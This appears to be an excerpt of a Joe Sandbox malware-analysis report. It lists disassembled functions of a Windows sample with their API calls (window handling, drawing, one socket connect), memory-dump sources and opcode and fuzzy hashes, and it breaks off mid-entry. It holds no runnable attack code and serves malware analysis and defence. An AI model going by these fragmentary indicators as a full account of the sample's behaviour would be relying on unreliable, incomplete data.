                                                                                          • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                          • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                                                          • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                          • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                                                          Function 00447BAF Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                          • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                          • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                          • String ID:
                                                                                          • API String ID: 659298297-0
                                                                                          • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                          • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                                          • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                          • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                                          Function 00447870 Relevance: 7.6, APIs: 5, Instructions: 94windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCursorPos.USER32(?), ref: 004478A7
                                                                                          • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                                          • GetCursorPos.USER32(?), ref: 00447935
                                                                                          • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CursorMenuPopupTrack$Proc
                                                                                          • String ID:
                                                                                          • API String ID: 1300944170-0
                                                                                          • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                          • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                                          • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                          • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                                                          Function 00448837 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                          • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                          • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                            • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                            • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                            • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                            • Part of subcall function 004413F0: SendMessageW.USER32(02FE1B10,000000F1,00000000,00000000), ref: 004414C6
                                                                                            • Part of subcall function 004413F0: SendMessageW.USER32(02FE1B10,000000F1,00000001,00000000), ref: 004414F1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$EnableMessageSend$LongShow
                                                                                          • String ID:
                                                                                          • API String ID: 142311417-0
                                                                                          • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                          • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                                                                          • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                          • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                                                                          Function 00449549 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 0044955A
                                                                                            • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                          • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                                                                          • _wcslen.LIBCMT ref: 004495C1
                                                                                          • _wcslen.LIBCMT ref: 004495CE
                                                                                          • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend_wcslen$_memset_wcspbrk
                                                                                          • String ID:
                                                                                          • API String ID: 1843234404-0
                                                                                          • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                          • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                                                                                          • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                          • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                                                                                          Function 00455014 Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                          • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                                                                          • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                          • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                                                                          Function 00445719 Relevance: 7.6, APIs: 5, Instructions: 76windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsWindowVisible.USER32(?), ref: 00445721
                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                                                          • _wcslen.LIBCMT ref: 004457A3
                                                                                          • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 3087257052-0
                                                                                          • Opcode ID: b8615011704e714012d326b35a72e373024cdcb02b0b49a0115346f3c93ca327
                                                                                          • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                                                          • Opcode Fuzzy Hash: b8615011704e714012d326b35a72e373024cdcb02b0b49a0115346f3c93ca327
                                                                                          • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                                                          Function 00459DCF Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsWindow.USER32(00000000), ref: 00459DEF
                                                                                          • GetForegroundWindow.USER32 ref: 00459E07
                                                                                          • GetDC.USER32(00000000), ref: 00459E44
                                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ForegroundPixelRelease
                                                                                          • String ID:
                                                                                          • API String ID: 4156661090-0
                                                                                          • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                          • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                                                                          • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                          • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                                                                          Function 00464950 Relevance: 7.6, APIs: 5, Instructions: 68networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                          • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 00464985
                                                                                          • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                                          • connect.WSOCK32(00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649CD
                                                                                          • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                                          • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 00464A07
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                          • String ID:
                                                                                          • API String ID: 245547762-0
                                                                                          • Opcode ID: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                                          • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                                                                          • Opcode Fuzzy Hash: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                                          • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                                                                          Function 0044710F Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DeleteObject.GDI32(00000000), ref: 00447151
                                                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                          • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                          • BeginPath.GDI32(?), ref: 004471B7
                                                                                          • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$Select$BeginCreateDeletePath
                                                                                          • String ID:
                                                                                          • API String ID: 2338827641-0
                                                                                          • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                          • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                                                          • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                          • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                                                          Function 0043770A Relevance: 7.6, APIs: 5, Instructions: 56sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                          • String ID:
                                                                                          • API String ID: 2875609808-0
                                                                                          • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                          • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                                                          • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                          • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                                                                                          Function 0046FCC6 Relevance: 7.5, APIs: 5, Instructions: 49windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32 ref: 0046FD00
                                                                                          • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                                                          • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                                                          • DestroyIcon.USER32(?), ref: 0046FD58
                                                                                          • DestroyIcon.USER32(?), ref: 0046FD5F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$DestroyIcon
                                                                                          • String ID:
                                                                                          • API String ID: 3419509030-0
                                                                                          • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                          • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                                                                          • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                          • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                                                                          Function 004175A2 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __getptd.LIBCMT ref: 004175AE
                                                                                            • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                            • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                          • __amsg_exit.LIBCMT ref: 004175CE
                                                                                          • __lock.LIBCMT ref: 004175DE
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 004175FB
                                                                                          • InterlockedIncrement.KERNEL32(02FE2D00), ref: 00417626
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                          • String ID:
                                                                                          • API String ID: 4271482742-0
                                                                                          • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                          • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                                                                          • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                          • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                                                                          Function 004555B8 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                          • DeleteObject.GDI32(?), ref: 0045564E
                                                                                          • DeleteObject.GDI32(?), ref: 0045565C
                                                                                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                          • String ID:
                                                                                          • API String ID: 4023252218-0
                                                                                          • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                          • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                                          • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                          • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                                          Function 0046032B Relevance: 7.5, APIs: 5, Instructions: 43windowtimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                                          • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                                          • MessageBeep.USER32(00000000), ref: 0046036D
                                                                                          • KillTimer.USER32(?,0000040A), ref: 00460392
                                                                                          • EndDialog.USER32(?,00000001), ref: 004603AB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3741023627-0
                                                                                          • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                          • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                                          • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                          • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                                                          Function 00455505 Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                                          • DeleteObject.GDI32(?), ref: 0045564E
                                                                                          • DeleteObject.GDI32(?), ref: 0045565C
                                                                                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                          Memory Dump Source
